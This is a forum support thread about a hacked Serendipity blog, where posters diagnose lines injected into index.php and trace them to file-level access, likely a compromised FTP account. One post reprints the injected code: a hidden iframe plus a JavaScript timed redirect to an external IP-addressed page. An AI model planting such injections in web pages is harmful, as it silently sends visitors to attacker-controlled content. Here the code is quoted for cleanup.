Blog hacked

Random stuff about serendipity. Discussion, Questions, Paraphernalia.
Post Reply
rolli

Blog hacked

Post by rolli »

Hi,

when i have a look at my CoWriters Testblog i noticed, that it was hacked. I dont now the reason why.

If you want to have a look at my hacked blog:

http://www.bibi-rolli.de/blog101/

Can anybody help me, the database seams to be clear ...

Best wishes,

Rolli
Top
tadpole
Regular
Posts: 88
Joined: Fri Oct 08, 2004 6:20 am
Location: 33°6'4.079" North, 117°3'6.563" West
Contact:
Contact tadpole

Post by tadpole »

Looks like they just inserted a few lines at the beginning of the index.php file. Delete them. An iframe and a script element, it looks like.

As far as why, it probably wasn't serendipity that they got in through.
Top
ionic

Could Be Anything...

Post by ionic »

You are running quite a lot of other applications...

Like a TRIAL version of Invision Power Board...

Of course you can drop a mail to phpaudit@suspekt.org and get an audit of your server for a fee ;)
Top
Rolli

Post by Rolli »

In the morning i have had a further look and you are right, this is the code:

<IFRAME style="WIDTH: 1125px; HEIGHT: 1000px" marginWidth=0 marginHeight=0 src="http://217.13.198.251/avs/newdir1/stoorm.html" frameBorder=0 width=150 scrolling=no height=185> </IFRAME>

Code: Select all

<script LANGUAGE="JavaScript">

    setTimeout("window.location='http://217.13.198.251/avs/newdir1/stoorm.html'",15000); 

    // delai d'attente en ms

</script>



<?php # $Id: index.php,v 1.77 2005/03/02 09:58:33 garvinhicking Exp $
but i think it must be a problem of the blog, my second testblok with another (different ) user is hacked also in the same way. the rest of my server is pretty well ....
Top
rolli
Posts: 3
Joined: Fri Apr 01, 2005 10:14 am
Location: Gemany
Contact:
Contact rolli

Post by rolli »

UPDATE

After deleting the iframes at the begin and the end of the index.php the blog works ok. I have checked my server twice for other intrusion and hacking, but anything is ok ... the hacker yust hacked my two testboards and nothing else ....
Top
garvinhicking
Core Developer
Posts: 30022
Joined: Tue Sep 16, 2003 9:45 pm
Location: Cologne, Germany
Contact:
Contact garvinhicking

Post by garvinhicking »

The thing is this: The attacker cannot have inserted the code if he didn't have file access to index.php

Check the permissions of index.php - if the file is only writable by your FTP user and not nobody (aka webserver) then it means your FTP account got hacked.

There would be no way how serendipity could overwrite the index.php from only within the application.

Regards,
Garvin
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
Top
Post Reply

Return to “General discussions”